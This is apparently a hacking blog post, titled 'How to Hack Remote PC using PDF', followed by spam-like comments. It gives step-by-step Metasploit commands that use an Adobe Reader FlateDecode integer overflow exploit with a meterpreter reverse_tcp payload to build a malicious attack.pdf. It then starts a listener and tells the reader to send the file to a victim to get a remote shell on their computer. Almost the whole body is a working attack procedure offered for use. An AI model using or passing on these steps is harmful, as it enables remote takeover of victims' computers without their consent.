How to Hack Remote PC using PDF

Adobe FlateDecode Stream Predictor 02 Integer Overflow

This module exploits integer overflow vulnerability in Adobe Reader and Adobe Acrobat Professional versions before 9.2.

Exploit Targets

0 – Adobe Reader Windows Universal (JS Heap Spray) (default)

Requirement

Attacker: Backtrack 5

Victim PC: Windows XP

Open backtrack terminal type msfconsole

How to Hack Remote PC using PDF

Now type use exploit/windows/fileformat/adobe_flatedecode_predictor02

Msf exploit (adobe_flatedecode_predictor02)>set payload windows/meterpreter/reverse_tcp

Msf exploit (adobe_flatedecode_predictor02)>show options

How to Hack Remote PC using PDF

Msf exploit (adobe_flatedecode_predictor02)>set lhost 192.168.1.3 (IP of Local Host)

Msf exploit (adobe_flatedecode_predictor02)>set filename attack.pdf

Msf exploit (adobe_flatedecode_predictor02)>exploit

After we successfully generate the malicious PDF, it will stored on your local computer

/root/.msf4/local/attack.pdf

How to Hack Remote PC using PDF

Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.1.3

exploit

Now send your attack.pdf files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer

How to Hack Remote PC using PDF

3 Comments How to Hack Remote PC using PDF

  1. certification ceh

    I just couldn’t leave your site before suggesting that I really loved the usual information an individual supply on your visitors? Is gonna be back frequently in order to check out new posts

    Reply
  2. ventanas

    Thanks for your marvelous posting! I definitely enjoyed reading
    it, you might be a great author. I will make sure to bookmark your blog and may come back in the
    future. I want to encourage that you continue your great job, have a nice day!

    Reply

Leave a Reply

Your email address will not be published. Required fields are marked *